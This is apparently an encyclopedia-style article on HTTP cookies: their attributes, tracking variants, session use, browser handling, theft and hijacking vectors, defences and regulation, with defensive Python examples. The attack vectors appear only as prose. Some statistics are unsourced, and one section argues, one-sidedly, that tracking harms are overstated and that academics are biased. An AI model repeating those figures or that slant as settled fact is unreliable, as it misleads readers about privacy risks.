The HttpOnly attribute prevents client-side scripts from reading the cookie, for example via document.cookie, thereby mitigating cross-site scripting (XSS) attacks in which malicious scripts could exfiltrate sensitive data like session tokens. Introduced by Microsoft in Internet Explorer 6 Service Pack 1 in 2002, it was later incorporated into RFC 6265 to standardize its behavior across user agents. Despite this protection against script-based theft, HttpOnly cookies remain vulnerable to network-level attacks and server-side compromises, as they are still sent in HTTP requests. It is set in the same way, e.g., Set-Cookie: sessionId=abc123; HttpOnly, and is independent of the Secure attribute, so the two can be combined for layered defenses.
The SameSite attribute controls whether the cookie is included in cross-site requests, addressing cross-site request forgery (CSRF) by withholding cookies from requests initiated by third-party sites unless explicitly allowed. Proposed by Google engineer Mike West and introduced in Chrome 51 in 2016, it gained broader adoption following Chrome's enforcement changes in version 80 (February 2020), which treated cookies without a SameSite attribute as "Lax" and required SameSite=None cookies to also specify Secure. Values include Strict (the cookie is never sent on cross-site requests, even top-level navigations), Lax (the cookie is also sent on top-level navigations that use safe methods such as GET), and None (the cookie is sent on cross-site requests but must be marked Secure), as specified in the RFC 6265bis drafts. This mitigates CSRF without fully blocking legitimate cross-site interactions, though it can break embedded content such as iframes if misconfigured.
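As an illustration of how the three attributes combine in a single header, the sketch below builds a Set-Cookie value with Python's standard http.cookies module (the samesite key requires Python 3.8 or later). The function name hardened_cookie and the default of Lax are assumptions chosen for the example.

```python
from http.cookies import SimpleCookie

ALLOWED_SAMESITE = ("Strict", "Lax", "None")


def hardened_cookie(name, value, samesite="Lax"):
    """Build a Set-Cookie value carrying Secure, HttpOnly and SameSite.

    Hypothetical helper: Secure is always set, which also satisfies
    the rule that SameSite=None cookies must be Secure.
    """
    if samesite not in ALLOWED_SAMESITE:
        raise ValueError(f"unsupported SameSite value: {samesite!r}")
    cookie = SimpleCookie()
    cookie[name] = value
    morsel = cookie[name]
    morsel["path"] = "/"
    morsel["secure"] = True      # only sent over HTTPS
    morsel["httponly"] = True    # hidden from document.cookie
    morsel["samesite"] = samesite
    return morsel.OutputString()


header = hardened_cookie("sessionId", "abc123")
print("Set-Cookie:", header)
```

The attributes are independent, so a deployment could drop HttpOnly for a cookie that scripts legitimately need to read while keeping Secure and SameSite.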

Advanced or Problematic Variants (Third-Party, Supercookies, Zombie Cookies)

Third-party cookies are HTTP cookies set by a domain other than the one the user is directly visiting, typically through embedded content such as advertisements, analytics scripts, or social media widgets loaded from external servers. These cookies enable cross-site tracking by associating user activity across multiple websites that embed the same third-party domain, facilitating behavioral profiling for targeted advertising, in many cases without explicit user consent. For instance, an advertising network can set a cookie via an ad iframe on a news site and later read it on an e-commerce platform to infer user interests. While not inherently malicious, third-party cookies raise significant privacy concerns due to their role in pervasive surveillance, prompting browser vendors to implement blocking mechanisms, such as default blocking in Safari and Firefox since around 2020 and phased restrictions in Chrome.
Supercookies are resilient tracking mechanisms that persist beyond standard cookie deletion, often relying on non-cookie storage such as HTTP headers, browser caches, or network-level identifiers rather than the browser's cookie jar. One common implementation embeds a unique identifier in HTTP response headers, such as ETags or server-specified headers, which browsers cache and resend, allowing identification even if cookies are cleared. Internet service providers have also used supercookies by inserting persistent IDs into traffic headers for network optimization or advertising, as documented in the case of Verizon's X-UIDH header, which tracked users across unaffiliated sites until public backlash led to its removal. These variants evade typical privacy tools because they operate outside browser cookie storage, complicating detection and blocking, though modern browsers such as Firefox, from version 85, have introduced partitioning to limit the effectiveness of cache-based supercookies across sites.
Zombie cookies, also known as evercookies, are persistent identifiers that automatically regenerate after deletion by exploiting multiple redundant storage mechanisms on the client device. They work by setting an identifier in browser cookies and simultaneously in alternative locations such as localStorage, IndexedDB, the HSTS cache, or plugin storage like Flash Local Shared Objects, then using JavaScript to detect deletions and restore the original value from the remaining copies. This resurrection technique preserves tracking IDs, enabling long-term user profiling that resists standard clearing methods, as demonstrated in proof-of-concept implementations that achieve near-indefinite persistence unless every storage vector is purged. Privacy implications include a heightened risk of unauthorized tracking, prompting recommendations for users to employ browser extensions, VPNs with tracking prevention, or full device wipes. No universal regulatory ban exists, so mitigation relies on evolving browser defenses and user vigilance.

Practical Applications

Enabling Session Management

HTTP is inherently stateless, with each request-response pair independent of prior interactions, so a separate mechanism is needed to maintain continuity for user sessions across multiple requests. Cookies address this by enabling servers to store a session identifier on the client device, which links to server-side data representing the user's session state. Upon session initiation, such as user authentication, the server generates a unique session ID (often a random, cryptographically secure string) and transmits it to the client via the Set-Cookie header in the HTTP response, for example: Set-Cookie: sessionid=abc123; Path=/; Secure; HttpOnly. The client stores this cookie and includes it in subsequent requests to the same domain using the Cookie header, such as Cookie: sessionid=abc123, allowing the server to map the ID to the relevant session data. This exchange, defined in RFC 6265, maintains state without embedding sensitive data directly in the cookie.
Session cookies, distinguished by the absence of an explicit Expires or Max-Age attribute, remain valid only for the duration of the browser session and are discarded when the browser closes, minimizing long-term storage risks. Servers typically prevent session fixation by regenerating IDs after authentication and enforce timeouts to invalidate stale sessions, which strengthens the security of this mechanism.
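The server-side half of this exchange can be sketched as a small in-memory session store. This is an illustrative assumption rather than any framework's actual API: the class name SessionStore, the 30-minute idle timeout, and the injectable clock are all hypothetical choices made for the example.

```python
import secrets
import time

SESSION_TTL_SECONDS = 1800  # assumed 30-minute idle timeout


class SessionStore:
    """Maps opaque session IDs (the cookie value) to server-side data."""

    def __init__(self, ttl=SESSION_TTL_SECONDS, clock=time.monotonic):
        self._ttl = ttl
        self._clock = clock
        self._sessions = {}  # session ID -> (data, last-seen time)

    def create(self, data=None):
        # token_urlsafe draws from a cryptographically secure source.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = (dict(data or {}), self._clock())
        return sid

    def get(self, sid):
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        data, last_seen = entry
        if self._clock() - last_seen > self._ttl:
            del self._sessions[sid]  # stale session: invalidate
            return None
        self._sessions[sid] = (data, self._clock())  # refresh idle timer
        return data

    def regenerate(self, old_sid):
        """Issue a fresh ID after login to counter session fixation."""
        data = self.get(old_sid)
        if data is None:
            return None
        del self._sessions[old_sid]
        return self.create(data)


store = SessionStore()
anonymous_sid = store.create({"user": None})
logged_in_sid = store.regenerate(anonymous_sid)
```

Only the identifier travels in the cookie; the data stays on the server, so invalidating the entry ends the session regardless of what the client still holds.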

Personalization and E-commerce Functionality

HTTP cookies facilitate website personalization by storing user-specific preferences, such as selected language, theme, or text size, enabling servers to retrieve and apply these settings on subsequent visits without requiring re-entry. Functional cookies, a subtype that is often persistent, maintain these choices across sessions, improving the user experience by avoiding repetitive configuration. For instance, if a user selects a dark mode interface, the cookie signals the server to render pages accordingly, so that user does not have to reapply the setting on each visit.
In content delivery, cookies enable tailored recommendations by linking user interactions, such as viewed pages or searched terms, to a user profile, allowing algorithms to infer interests and prioritize relevant material. This process relies on first-party cookies set by the visited domain itself, which store or reference data such as browsing history summaries to generate suggestions without cross-site tracking. Such personalization is reported to increase engagement; for example, sites using cookie-based preference matching report higher return visit rates than stateless alternatives.
For e-commerce, cookies underpin core functionality like shopping cart persistence, where session cookies track temporarily selected items during a visit, keeping the cart intact as the user moves between pages. Persistent cookies extend this by preserving cart contents or wishlists beyond the end of the session, permitting users to resume abandoned purchases on return, which helps counter cart abandonment rates estimated at 70% in online retail. Cookies can also reference order history or related data, feeding recommendation engines that suggest complementary products based on prior transactions, a practice associated with higher average order value. Without cookies, e-commerce platforms would have to fall back on stateless interactions, requiring the cart to be rebuilt on every visit and reducing conversion rates.

Behavioral Tracking for Advertising

Behavioral tracking for advertising relies primarily on third-party HTTP cookies to monitor user activity across multiple websites, enabling advertisers to construct detailed profiles of individual habits and preferences. These cookies are set by ad networks or analytics providers embedded via scripts or ad tags on many different sites, assigning a unique identifier to the user's browser that persists across domains. By correlating this identifier with observed behaviors, such as pages visited, time spent, and interactions, advertisers aggregate data to infer interests, demographics, and purchase intent, which supports targeted ad delivery.
The mechanism begins when a user loads a webpage containing third-party content, like a banner ad or tracking pixel from an external domain; the third-party server responds with a Set-Cookie header carrying the identifier, sometimes alongside timestamps or event data. Subsequent visits to other sites with the same third-party elements return the cookie to that server, building a longitudinal record of cross-site activity. Techniques such as retargeting, which displays ads for previously viewed products, and frequency capping, which limits ad exposures to avoid user fatigue, depend on this persistent tracking. Advertising cookies, the most prevalent type of third-party cookie, dominate this ecosystem, powering behavioral targeting that matches users to campaigns based on inferred profiles.
Third-party cookie tracking emerged shortly after the invention of HTTP cookies in 1994 by Netscape engineers and gained prominence in the late 1990s with the rise of ad networks like DoubleClick, which used it for cross-site personalization and measurement. By enabling audience segmentation and real-time bidding in programmatic advertising, these cookies have underpinned the growth of digital ad markets, with usage in over 78% of U.S. programmatic ad buys as of November 2023. Globally, more than 40% of websites deploy cookies for such purposes, underscoring their role in generating targeted ad revenue, which makes up a significant portion of online advertising income.
This tracking extends to applications such as visitor profiling for data trading among brokers and integration with analytics for attribution modeling, where cookies link user actions to conversion events across sessions. However, reliance on third-party cookies exposes advertising revenue to browser restrictions, as reflected in projections of 20-30% revenue losses for publishers if the cookies are removed without viable alternatives. Data from ad ecosystems indicates that sites employing tracking cookies achieve approximately 4% higher revenue than those without, suggesting a link between cookie-enabled targeting and monetization outcomes.

Technical Implementation

Setting and Retrieving Cookies

HTTP servers set cookies by including one or more Set-Cookie header fields in the response to an HTTP request. Each Set-Cookie header specifies a cookie as a name-value pair, optionally followed by attributes such as Expires, Max-Age, Domain, Path, Secure, and HttpOnly, which dictate storage, transmission, and expiration rules. For example, a server might respond with:

HTTP/1.1 200 OK
Set-Cookie: sessionId=abc123; Expires=Sun, 26 Oct 2025 10:00:00 GMT; Path=/; Secure; HttpOnly

Upon receiving this, the user agent (typically a web browser) parses the header and, if the cookie meets acceptance criteria (e.g., valid syntax, non-blocked domain), stores it locally in its cookie store, often a file or in-memory structure keyed by domain and path. Browsers may reject or ignore Set-Cookie headers based on policies, such as per-domain limits (e.g., 50 cookies per domain in many implementations) or privacy settings that block third-party cookies.
To retrieve cookies, the browser automatically includes a Cookie request header in subsequent HTTP requests to matching hosts, listing the relevant stored cookies as semicolon-separated name-value pairs without attributes. Matching is determined by comparing the request URI against the cookie's Domain and Path attributes; for instance, a cookie with Path=/ applies to all paths on the domain, while Secure restricts it to HTTPS. The request header might appear as:

GET /profile HTTP/1.1
Host: example.com
Cookie: sessionId=abc123; preference=dark

The server then parses the Cookie header to read the values it needs, for example to authenticate the session or personalize the response. A newly set cookie replaces any stored cookie with the same name, domain, and path; cookies that share a name but differ in domain or path are all sent, with those on longer paths listed first. Because HTTP itself is stateless, cookies are what carry state from one request to the next. Standardized in RFC 6265 (published April 2011), the mechanism allows multiple cookies per response, one per Set-Cookie header, while user agents filter and sort stored cookies so that only those matching the request are transmitted, which limits header size. Client-side scripts can also read and write cookies via document.cookie, except for cookies marked HttpOnly, which are only set and sent through HTTP headers.
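On the server side, reading the Cookie request header amounts to splitting it into name-value pairs. A minimal sketch with Python's standard http.cookies module follows; the function name parse_cookie_header is an assumption for illustration, and real frameworks usually expose parsed cookies directly.

```python
from http.cookies import SimpleCookie


def parse_cookie_header(header_value):
    """Turn a Cookie request header value into a plain dict.

    Hypothetical helper: the Cookie header carries only names and
    values, never attributes such as Path or Secure.
    """
    jar = SimpleCookie()
    jar.load(header_value)
    return {name: morsel.value for name, morsel in jar.items()}


cookies = parse_cookie_header("sessionId=abc123; preference=dark")
print(cookies["sessionId"], cookies["preference"])
```

A server would typically treat every value obtained this way as untrusted input, since the client controls the header's contents.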

Key Attributes and Their Functions

HTTP cookies are defined through the Set-Cookie header in server responses, consisting of a name-value pair and optional attributes that govern their scope, lifetime, transmission conditions, and accessibility. The name identifies the cookie within its domain and path, while the value stores the actual data; implementations typically limit each cookie to about 4 KB in total.
The Domain attribute specifies the hosts to which the cookie applies. When it is set (e.g., Domain=example.com), the cookie is sent to that domain and all of its subdomains; a leading dot, as in .example.com, is a legacy convention that RFC 6265 ignores. When it is omitted, the cookie is restricted to the exact host that set it and is not sent to subdomains, which prevents unintended exposure while still allowing site-wide sharing when explicitly requested.
The Path attribute limits the URI paths under the domain for which the cookie is valid, defaulting to the directory of the request URI's path if unspecified; it ensures cookies are sent only for the relevant sections of a site, reducing unnecessary transmissions.
Persistence is controlled by the Expires or Max-Age attributes: Expires sets an absolute date and time for deletion, while Max-Age defines a lifetime in seconds from the time the cookie is set and takes precedence if both are present. If neither is given, the result is a session cookie that is discarded when the browser closes.
The Secure flag requires that the cookie be transmitted only over encrypted connections, mitigating interception risks on untrusted networks; the cookie is simply omitted from plain HTTP requests. HttpOnly prevents JavaScript access via document.cookie, blocking client-side extraction and thereby limiting cross-site scripting (XSS) attacks that could exfiltrate sensitive data. The SameSite attribute regulates inclusion in cross-site requests: Strict blocks all cross-site sending, Lax permits top-level navigations using safe methods like GET, and None allows all cross-site sending but requires Secure. Introduced to curb cross-site request forgery (CSRF), its default varies by browser.
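How Domain and Path scope a cookie can be sketched as two small predicates modelled on the domain-match and path-match rules in RFC 6265 (sections 5.1.3 and 5.1.4). The function names are illustrative, and the sketch deliberately omits public-suffix checks and the host-only flag that real browsers also apply.

```python
import ipaddress


def domain_matches(request_host, cookie_domain):
    """True if request_host falls within cookie_domain's scope."""
    host = request_host.lower()
    domain = cookie_domain.lower()
    if domain.startswith("."):
        domain = domain[1:]  # a leading dot is ignored
    if host == domain:
        return True
    try:
        ipaddress.ip_address(host)
        return False  # IP addresses only match exactly
    except ValueError:
        pass
    # Subdomain match must fall on a label boundary.
    return host.endswith("." + domain)


def path_matches(request_path, cookie_path):
    """True if the cookie's path is a prefix of the request path
    ending on a "/" boundary."""
    if request_path == cookie_path:
        return True
    if request_path.startswith(cookie_path):
        return cookie_path.endswith("/") or request_path[len(cookie_path)] == "/"
    return False


print(domain_matches("shop.example.com", "example.com"))
print(path_matches("/account/settings", "/account"))
```

The boundary checks matter: without them a cookie for example.com would leak to badexample.com, and one for /foo would be sent to /foobar.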

Browser and Client-Side Handling

Default Processing and Storage

Upon receiving an HTTP response containing a Set-Cookie header, web browsers parse the header according to the algorithm outlined in RFC 6265, extracting the cookie name-value pair and any attributes separated by semicolons. The parser tolerates malformed elements to preserve compatibility and matches attribute names case-insensitively. If the Domain attribute is absent, the cookie's domain defaults to the host of the originating request, preventing automatic subdomain sharing. Similarly, without a Path attribute, the path defaults to the directory portion of the request URI (e.g., /foo for a request to /foo/bar.html). Absence of both Max-Age and Expires results in a session cookie, which persists only until the browser session ends.
The browser then stores the parsed cookie in its internal cookie store, recording fields such as name, value, domain, path, expiry time (if persistent), creation time, last-access time, and flags indicating persistence, host-only scope, secure transmission requirements, and HttpOnly status. Before storage, the browser evicts any expired cookies from the store and may discard the least recently used ones if limits are exceeded; RFC 6265 recommends minimum capacities of 4096 bytes per cookie, 50 cookies per domain, and 3000 cookies in total. Persistent cookies are saved to durable storage such as SQLite databases (for instance, Chrome and Firefox keep them in database files within user profile directories), while session cookies are flagged for in-memory retention or deletion when the browser closes.
For outgoing requests, browsers by default include matching cookies in the Cookie request header, filtering by domain match (exact host, or a parent domain when the Domain attribute was set, subject to public suffix rules), path prefix match, non-expired status, and flag compliance (e.g., secure cookies only over HTTPS). Selected cookies are serialized into a single header value, sorted first by descending path length and then by ascending creation time to break ties, giving a deterministic order without user intervention unless privacy settings alter the defaults. This process applies to first-party contexts by default; whether cookies are included in third-party contexts varies with browser policy.
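Two of the defaults described above are easy to state as code: the default path computed when no Path attribute is given, and the ordering of cookies in the outgoing Cookie header. The sketch below follows the RFC 6265 algorithms (under which the default path drops the trailing slash, so /foo/bar.html yields /foo); the StoredCookie type and function names are assumptions made for the example.

```python
from dataclasses import dataclass


def default_path(request_path):
    """Default cookie path for a request path (RFC 6265, section 5.1.4)."""
    if not request_path.startswith("/"):
        return "/"
    if request_path.count("/") <= 1:
        return "/"
    # Everything up to, but not including, the right-most "/".
    return request_path[: request_path.rfind("/")]


@dataclass
class StoredCookie:
    """Hypothetical, simplified record of a stored cookie."""
    name: str
    value: str
    path: str
    creation_time: float


def serialize_cookie_header(cookies):
    """Order cookies by longer path first, then earlier creation time."""
    ordered = sorted(cookies, key=lambda c: (-len(c.path), c.creation_time))
    return "; ".join(f"{c.name}={c.value}" for c in ordered)


jar = [
    StoredCookie("a", "1", "/", 1.0),
    StoredCookie("b", "2", "/account", 2.0),
    StoredCookie("c", "3", "/", 0.0),
]
print(default_path("/foo/bar.html"))
print(serialize_cookie_header(jar))
```

The sketch assumes the cookies passed in have already been filtered for domain, path, expiry, and Secure; only the ordering step is shown.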

User Controls and Blocking Mechanisms

Web browsers incorporate built-in settings that allow users to manage HTTP cookies by blocking them entirely, restricting third-party cookies, or configuring exceptions on a per-site basis. For example, Google Chrome enables users to block third-party cookies via the Privacy and security section in settings, which prevents cookies set by domains other than the visited site from being stored or sent. Firefox provides options to block cookies and site data from specific websites through the Page Info dialog or Enhanced Tracking Protection settings, which limit cross-site tracking by default. Apple Safari similarly offers toggles under Privacy to prevent cross-site tracking and block all cookies. These mechanisms instruct the browser to reject Set-Cookie headers or discard the cookies on receipt, though blocking all cookies can impair site functionality such as login persistence or shopping carts.
Private or incognito browsing modes in major browsers provide temporary cookie isolation: cookies are stored only for the duration of the private session and deleted when it is closed, preventing persistence across sessions. In Chrome's Incognito mode, for instance, third-party cookies are blocked by default, and all data is discarded at exit, reducing tracking continuity without affecting normal browsing profiles. Private browsing modes in other browsers employ similar session-scoped storage, so that cookies do not survive once the private windows are closed. This approach does not eliminate cookies during the session but limits their value for long-term profiling.
Browser extensions extend user control by automating cookie rejection, particularly for tracking purposes. Tools like Privacy Badger learn from browsing patterns to block third-party trackers that attempt to set cookies without user interaction, using heuristics to identify hidden tracking. Ad blockers identify and suppress cookie-based trackers, often combining this with content filters that hide consent banners while enforcing blocks. Extensions such as Disable Cookies or I Don't Care About Cookies allow one-click toggling of all cookies on the current site or automatic rejection of non-essential ones, avoiding manual configuration. These add-ons operate by intercepting Set-Cookie responses or modifying HTTP requests, though their effectiveness depends on timely updates as trackers adopt evasions like fingerprinting.
The Do Not Track (DNT) HTTP header, enabled in browser settings, sends a signal (DNT: 1) requesting that sites refrain from behavioral tracking via cookies, but its effectiveness remains limited because compliance is voluntary and many advertisers ignore it. Proposed in 2011 and supported in browsers like Firefox and Chrome (where it is off by default), DNT lacks legal enforcement, with studies showing minimal reduction in tracking, often less than 20% in cookie deployment, as sites prioritize revenue over the signal.
Users can also clear stored cookies manually through browser interfaces. In developer tools, users navigate to the Application or Storage tab, select a domain under Cookies, and delete individual or all entries for that domain; site settings likewise list cookies by origin and allow them to be deleted to reset tracking state. If cookies may have been compromised, logging out of the associated sites and changing passwords is recommended.
Regulatory frameworks indirectly bolster user controls by mandating site-side consent mechanisms, such as GDPR's requirement for explicit opt-in to non-essential cookies, which browsers can complement through blocking defaults. However, blocking depends primarily on browser implementations rather than laws, with no universal federal mandate in regions like the United States, so its effectiveness is left to user configuration and tool adoption. Audit data indicates that combining browser blocks with extensions reduces third-party cookie loads by up to 90% on average, though sites increasingly shift to alternatives like local storage when cookies are unavailable.

Security Vulnerabilities

Common Attack Vectors (Theft, Hijacking)

HTTP cookies, particularly session cookies, are prime targets for theft due to their role in maintaining authenticated states, enabling attackers to hijack sessions by replaying stolen values. Cookie theft involves unauthorized capture of cookie data, while hijacking entails using that data to impersonate the legitimate user, often termed a "pass-the-cookie" attack. Without protective attributes like the Secure and HttpOnly flags, cookies transmitted over unencrypted channels or accessible to client-side scripts are vulnerable.
One prevalent vector is cross-site scripting (XSS), where attackers inject malicious scripts into web pages viewed by victims, allowing the scripts to run in the browser context and exfiltrate non-HttpOnly cookies via document.cookie. Reflected, stored, and DOM-based XSS variants all enable this; for instance, an attacker might embed a script that sends cookie data to a remote server. OWASP identifies XSS as a core mechanism for cookie theft, noting that without input sanitization and output encoding, even trusted sites can deliver such payloads.
Man-in-the-middle (MITM) attacks exploit unencrypted HTTP connections, intercepting traffic on insecure networks like public Wi-Fi to capture Cookie headers in requests or Set-Cookie headers in responses. Packet-sniffing tools such as Wireshark reveal session identifiers if the Secure flag, which restricts transmission to HTTPS, is absent. Adversary-in-the-middle variants, using reverse proxies like Evilginx, extend this by luring victims into authenticating through attacker-controlled proxies, yielding post-login cookies that bypass multi-factor authentication (MFA). The FBI reported in October 2024 that cybercriminals increasingly steal such cookies to access accounts without triggering MFA.
Malware and phishing are direct client-side theft vectors, with trojans dumping browser storage or process memory to extract cookies, or phishing sites prompting users to export them. Malicious browser extensions can similarly access storage APIs. MITRE ATT&CK documents adversaries using malware to exfiltrate session cookies, enabling hijacking without network interception. Session sniffing, a form of MITM, passively collects cookies in transit.
Once obtained, stolen cookies enable hijacking when injected into the attacker's browser or requests, granting access to the victim's session until it expires or is invalidated. This bypasses the initial authentication step, because the server accepts a valid cookie without re-verifying who presents it. Documented cases, such as those involving MFA evasion, show the technique's effectiveness, with attackers maintaining access across devices.

Defensive Measures and Best Practices

Developers mitigate cookie theft and hijacking primarily through standardized attributes in the Set-Cookie header. The HttpOnly attribute prevents client-side scripts from accessing the cookie via document.cookie, thereby reducing exposure to cross-site scripting (XSS) attacks that could otherwise exfiltrate cookie values. The Secure attribute ensures cookies are transmitted only over HTTPS connections, blocking interception on unencrypted HTTP channels where attackers could mount man-in-the-middle (MITM) attacks. Combining these with the SameSite attribute, set to "Strict" to block cookies in all cross-site requests or "Lax" to allow only safe top-level navigations, counters cross-site request forgery (CSRF) by limiting the inclusion of cookies in requests from external sites.
Additional server-side practices include prefixing sensitive cookie names with __Secure- (which requires the Secure attribute and a secure origin) or __Host- (which additionally requires Path=/ and forbids the Domain attribute, binding the cookie to a single host), preventing overwriting by insecure or sibling-domain sources. Sensitive data, such as tokens, should not be stored directly in cookies; instead, use opaque session IDs referencing server-side state to minimize the impact of a breach if cookies are compromised. Regenerating session identifiers upon login or privilege changes, coupled with short expiration times (e.g., session-only cookies that are deleted when the browser closes), limits the window for exploitation after theft.
On the client side, modern browsers enforce these attributes by default, but users can enhance protection by enabling third-party cookie blocking, available in settings like Chrome's "Block third-party cookies" or Firefox's Enhanced Tracking Protection, which curtails cross-domain tracking and potential hijacking vectors. Regularly clearing cookies and site data and using private browsing modes that avoid persistent storage provide further defenses. Multi-factor authentication (MFA) adds another layer, particularly when sites require re-authentication for sensitive actions, though it does not by itself prevent replay of an already-issued session cookie. Web application firewalls (WAFs) and endpoint detection tools monitor for suspicious traffic patterns indicative of theft attempts, such as rapid session reuse from new IP addresses.
  • Implementation checklist for developers:
    • Mandate HTTPS for all cookie-setting endpoints to enforce Secure.
    • Validate and regenerate sessions on re-authentication if hijacking is suspected.
    • Avoid JavaScript-based cookie manipulation for critical sessions; rely on HTTP headers.
These measures, when layered, address vulnerabilities observed in breaches where unflagged cookies enabled prolonged unauthorized access, though no single practice eliminates risk entirely without broader security hygiene.
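The attribute checks described in this section can be automated in a simple audit step. The following is a minimal sketch, assuming a hypothetical function audit_set_cookie that inspects one Set-Cookie header value; it splits naively on semicolons and is not a full RFC 6265 parser.

```python
def audit_set_cookie(header_value):
    """Return a list of findings for one Set-Cookie header value."""
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()

    findings = []
    if "secure" not in attrs:
        findings.append("missing Secure")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly")
    samesite = attrs.get("samesite", "").lower()
    if samesite not in ("strict", "lax", "none"):
        findings.append("missing or invalid SameSite")
    elif samesite == "none" and "secure" not in attrs:
        findings.append("SameSite=None requires Secure")

    # Name prefixes add requirements of their own.
    if name.startswith("__Host-"):
        if "domain" in attrs or attrs.get("path") != "/" or "secure" not in attrs:
            findings.append("__Host- prefix requirements not met")
    elif name.startswith("__Secure-") and "secure" not in attrs:
        findings.append("__Secure- prefix requires Secure")
    return findings


good = audit_set_cookie("sessionId=abc123; Path=/; Secure; HttpOnly; SameSite=Lax")
bad = audit_set_cookie("sessionId=abc123")
print(good, bad)
```

A check like this could run in tests or a response middleware; it flags missing attributes but cannot judge whether the cookie's value itself is safe to expose.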

Privacy Implications

Tracking Capabilities and User Profiling

HTTP cookies, particularly third-party cookies, facilitate extensive user tracking by allowing entities other than the visited website to store and retrieve data on a user's browser. Third-party cookies are set by domains distinct from the primary site, often embedded via scripts from advertising networks, analytics providers, or social plugins, enabling the correlation of user activity across multiple unrelated websites. This cross-site persistence assigns a unique pseudonymous identifier to the browser, which trackers associate with behavioral data such as pages viewed, time spent, and interactions, building a longitudinal record of online navigation independent of explicit logins.
Cookies themselves do not store or reveal historical IP addresses, as they typically contain session identifiers, preferences, or tracking IDs rather than IP data. Servers independently capture and log the current IP address from each HTTP request. However, persistent cookies with unique identifiers allow websites to associate multiple IP addresses from different visits with the same user profile in server-side logs, enabling indirect tracking of IP changes over time, though this data remains on the server and is not exposed via the cookie.
User profiling emerges from aggregating these tracked signals into inferred attributes, preferences, and demographics, primarily for behavioral advertising. Advertisers use cookie data to construct profiles encompassing interests (e.g., inferred from visited product pages or content categories), purchase intent (via abandoned carts or search queries), and even socioeconomic indicators derived from site affinities. For instance, a cookie from an ad tech firm might link visits to sports sites, travel aggregators, and finance sites to profile a user as a "middle-income traveler interested in investments," triggering tailored ad auctions that attract higher bids from relevant campaigns. Empirical analyses support this: a study of web cookies found that third-party placements transmit substantial behavioral data, with a small number of top trackers dominating cross-domain footprints on over 90% of measured sites.
The scale of such profiling underscores the role of cookies in programmatic advertising, where third-party identifiers underpin real-time bidding for ad impressions. As of Q3 2023, more than 75% of U.S. programmatic ad transactions across major industries relied on cookie-based targeting, enabling precise audience segmentation but raising concerns over opaque data collection without granular consent. Despite browser restrictions and regulatory pressures like GDPR, which reduced third-party cookie creation by 22% on news sites after 2018, third-party cookies remain deployed on over 40% of active websites, sustaining profiling capabilities amid evolving mitigations.

Empirical Evidence on Risks vs. Perceived Harms

While HTTP cookies facilitate user tracking across sessions, empirical analyses indicate that direct harms, such as financial loss, stem predominantly from cookie theft or session hijacking rather than from standard tracking mechanisms. A 2015 study of cookie integrity flaws demonstrated successful real-world exploits that resulted in privacy violations, online victimization, account hijacking, and financial losses for affected users, often by exploiting weaknesses such as insecure transmission of cookies set without proper flags. These incidents point to risks from inadequate implementation: stolen session cookies enable unauthorized access, but such attacks require an additional vector, such as network interception, which limits their baseline prevalence absent some compromise of the user.

In contrast, routine third-party cookie-based profiling for advertising has few documented tangible harms, and no large-scale study links it directly to widespread economic damage. Available data instead indicates that over 93.7 billion stolen cookies were circulating on illicit markets as of 2025, harvested primarily via malware or breaches rather than through inherent cookie flaws.

Perceived risks, amplified by regulatory and media narratives, often outpace measured impacts, as the privacy paradox illustrates: users report high concern over tracking via cookies, yet rarely change behaviors such as rejecting trackers, and surveys show only marginal shifts after GDPR took effect in 2018. For instance, cookie disclaimers intended to heighten awareness did not significantly raise user rejection rates or privacy-protective actions, suggesting that harms like manipulative targeting are overestimated; empirical models attribute them more to broader data ecosystems than to cookies alone.

Quantitative assessments highlight a further discrepancy: economic analyses focus on publisher losses from cookie restrictions (for example, reduced ad revenues estimated at billions annually) rather than on user-side harms, implying that perceived privacy erosion drives policy more than verified damage does. Risks persist in unsecured contexts, such as non-HTTPS sites that expose cookies to sniffing, but mitigations like the Secure and HttpOnly attributes have curtailed these vulnerabilities since their widespread adoption after 2010, reducing incidence compared with the early web. Source biases in academia toward amplifying surveillance narratives may also inflate perceptions without proportional evidence of population-level harms.
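As a minimal illustration of the Secure and HttpOnly mitigations mentioned above, the following Python sketch builds a Set-Cookie header value with the standard library's http.cookies module. The cookie name session_id, the helper build_session_cookie, and the choice of SameSite=Lax are assumptions made for this example, not details taken from any particular site.

```python
from http.cookies import SimpleCookie


def build_session_cookie(session_id: str) -> str:
    """Return a Set-Cookie header value with hardening attributes (illustrative)."""
    cookie = SimpleCookie()
    cookie["session_id"] = session_id  # hypothetical cookie name
    morsel = cookie["session_id"]
    morsel["secure"] = True      # only send the cookie over HTTPS
    morsel["httponly"] = True    # hide the cookie from page scripts
    morsel["samesite"] = "Lax"   # assumption: limit cross-site sending
    morsel["path"] = "/"
    return morsel.OutputString()


if __name__ == "__main__":
    print("Set-Cookie:", build_session_cookie("abc123"))
```

A cookie issued this way is not readable through document.cookie and is not sent over plain HTTP, which addresses the sniffing and script-extraction paths described in this section.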

Regulatory Frameworks and Their Impacts

The ePrivacy Directive, adopted in 2002 and often termed the "cookie law," requires websites to obtain users' prior consent before storing or accessing non-essential cookies on devices within the European Union, with an exemption for strictly necessary cookies essential to providing the service. This framework operates alongside the General Data Protection Regulation (GDPR), effective May 25, 2018, which treats cookies as personal data when they enable user identification or profiling, subjecting their processing to GDPR's consent, transparency, and data minimization requirements.

In the United States, the California Consumer Privacy Act (CCPA), enacted in 2018 and operative from January 1, 2020, does not impose blanket cookie consent. It instead requires businesses to give notice of data collection via cookies and to honor opt-out rights for the "sale" of personal information, and amendments under the California Privacy Rights Act (CPRA) extend those rights to sharing for cross-context behavioral advertising.

Enforcement under these regimes has resulted in significant penalties for non-compliance, particularly in the EU, where data protection authorities prioritize cookie consent violations. For instance, France's CNIL imposed fines totaling €210 million on Google (€150 million) and Meta (€60 million) in decisions dated December 31, 2021, and announced in January 2022, for deploying advertising cookies without valid consent, citing interfaces that made refusing cookies harder than accepting them. CNIL also levied a €40 million fine in March 2019 for similar consent failures in tracking technologies, one of the earliest major cookie-related penalties after GDPR took effect. In the U.S., CCPA enforcement has been lighter on cookies specifically, with the Federal Trade Commission (FTC) pursuing cases under its broader unfair-practices authority; state attorneys general have nonetheless issued notices, such as California's 2023 actions against companies for inadequate opt-out mechanisms in tracking cookies.

